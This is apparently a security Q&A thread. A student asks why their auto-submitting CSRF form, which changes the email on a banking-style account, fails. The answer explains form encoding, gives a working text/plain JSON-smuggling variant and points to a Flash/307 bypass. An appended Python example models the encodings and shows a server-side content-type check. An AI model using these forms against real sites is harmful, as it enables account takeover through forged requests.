
So I'm testing this site for coursework and I think it might be vulnerable to CSRF; however, when I try to make a POST request I get a validation error which says "locale" is required, despite me specifying it in the request. Here's the form source code.

<html>
<head>
</head>
<body>
    <form action="http://account.testbank.com/api/account/v1/user/email" method="post" enctype='applicatiom/json'>
        <input name='{"email":"testuser@gmail.com" ,"locale": "en"}'>
        <input type="hidden" name="locale" id="locale" value="en-US">
        <script> document.forms[0].submit()</script>
    </form>     
</body>
</html>

What am I doing wrong?

EdOverflow
光量子

1 Answer


I see you want to send a JSON format; an HTML form builds a POST request taking the name and value attributes in the following way:

name1=value1&name2=value2

So, your POST request could look like this:

{"email":"testuser@gmail.com" ,"locale": "en"}=&locale=en-US

As you can see, it's an incorrect JSON format and the application could generate an error. Also, you are using the value applicatiom/json for the attribute enctype to specify the content-type header, but this could encode the body of the POST request, something like this:

%7B%22email%22%3A%22testuser%40gmail.com%22%20,%22locale%22%3A%20%22en%22%7D=&locale=en-US

You have another incorrect JSON format.

So, if the application doesn't validate content-type, you could use text/plain instead of applicatiom/json and change your form in the following way:

<input name='{"email":"testuser@gmail.com" ,"locale": "en' value='"}'>

The POST request would be the following:

{"email":"testuser@gmail.com" ,"locale": "en="}

Now, you have a correct JSON format; the only problem might be the character =.

If the application validates content-type, there is a technique involving a Flash script and an HTTP 307 response; I'll share a link about this technique with you.

CSRF Flash 307

I hope this information helps you.

Good luck.

hmrojas.p
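The following is an added example (not code from the question or the answer) that replays the two forms discussed above through a model of how a browser encodes a form body, and then through the kind of server-side gate a JSON endpoint should apply. The form_body model covers only the two encodings discussed here (an assumption); the accept_json_request function, the field lists and the expected results are constructed for this illustration.

```python
import json
from urllib.parse import quote_plus

def form_body(enctype, fields):
    """Body a browser builds from a form's (name, value) pairs, in document order.
    Only the two encodings discussed above are modelled (an assumption): text/plain
    emits "name=value\\r\\n" per field with no escaping; anything else, including the
    misspelt 'applicatiom/json', falls back to application/x-www-form-urlencoded."""
    if enctype == "text/plain":
        return "".join(f"{n}={v}\r\n" for n, v in fields)
    return "&".join(f"{quote_plus(n)}={quote_plus(v)}" for n, v in fields)

def accept_json_request(content_type, body):
    """Server-side gate for a JSON endpoint: require the real JSON media type,
    then parse strictly and enforce the required field. Returns (ok, detail).
    This is input hygiene, not a CSRF defence on its own; pair it with a CSRF
    token or SameSite cookies, since the answer above notes that content-type
    checks alone can be sidestepped."""
    mime = content_type.split(";", 1)[0].strip().lower()
    if mime != "application/json":
        return False, "unsupported media type"
    try:
        data = json.loads(body)
    except ValueError:
        return False, "malformed JSON"
    if not isinstance(data, dict) or "locale" not in data:
        return False, "locale is required"
    return True, data

# Constructed replay of the form from the question and the one from the answer.
ORIGINAL_FIELDS = [('{"email":"testuser@gmail.com" ,"locale": "en"}', ""),
                   ("locale", "en-US")]
SPLIT_FIELDS = [('{"email":"testuser@gmail.com" ,"locale": "en', '"}')]

def original_form_result():
    # Misspelt enctype -> urlencoded body and header; the body never parses as JSON.
    body = form_body("applicatiom/json", ORIGINAL_FIELDS)
    return body, accept_json_request("application/x-www-form-urlencoded", body)

def split_form_result():
    # text/plain body is valid JSON (locale becomes "en="), so a server that
    # parsed the body without checking Content-Type would accept it.
    body = form_body("text/plain", SPLIT_FIELDS)
    return json.loads(body), accept_json_request("text/plain", body)

if __name__ == "__main__":
    print(original_form_result())
    print(split_form_result())
```

Running it shows why the question's form fails twice over (wrong media type and a body that is not JSON), and that the answer's text/plain variant is only stopped by the media-type check, not by the JSON parser.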